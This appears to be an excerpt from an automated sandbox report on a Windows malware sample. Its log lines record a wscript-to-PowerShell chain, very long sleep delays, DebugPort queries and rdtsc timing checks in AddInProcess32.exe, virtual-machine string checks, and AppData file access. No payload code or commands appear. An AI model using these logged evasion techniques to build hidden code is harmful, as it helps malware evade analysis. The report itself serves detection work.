          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\wermgr.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191D1C0 rdtsc 5_2_0191D1C0
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5845Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4021Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6126Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3601Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4260
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5513
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6706
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2937
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6236
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3487
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6241
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6552
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3081
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7168
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2550
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5643
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4071
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6982
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2769
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 0.8 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 0.3 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 0.3 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeAPI coverage: 0.3 %
          Source: C:\Windows\System32\wscript.exe TID: 7104Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Windows\System32\wscript.exe TID: 6892Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6332Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 4180Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6552Thread sleep time: -11068046444225724s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1060Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6716Thread sleep time: -11068046444225724s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 5984Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6248Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6040Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5728Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6392Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6436Thread sleep time: -12912720851596678s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1908Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5028Thread sleep time: -5534023222112862s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 1120Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7124Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 2268Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412Thread sleep time: -10145709240540247s >= -30000s
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6416Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1708Thread sleep time: -9223372036854770s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: wscript.exe, 00000000.00000003.2142682570.0000021315A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163847317.0000021315A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168596475.0000021315A84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWll.mui#o.0
          Source: wscript.exe, 00000000.00000003.2142682570.0000021315A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2163847317.0000021315A84000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168596475.0000021315A84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: wscript.exe, 00000000.00000003.2167136542.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2148962279.0000021315A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2168519101.0000021315A43000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2167296728.0000021315A3C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2165814195.0000021315A25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2142780136.0000021315A3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0191D1C0 rdtsc 5_2_0191D1C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_00DC7593 LdrLoadDll,5_2_00DC7593
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_018E0185 mov eax, dword ptr fs:[00000030h]5_2_018E0185
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0192019F mov eax, dword ptr fs:[00000030h]5_2_0192019F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 5_2_0192019F mov eax, dword ptr fs:[00000030h]5_2_0192019F
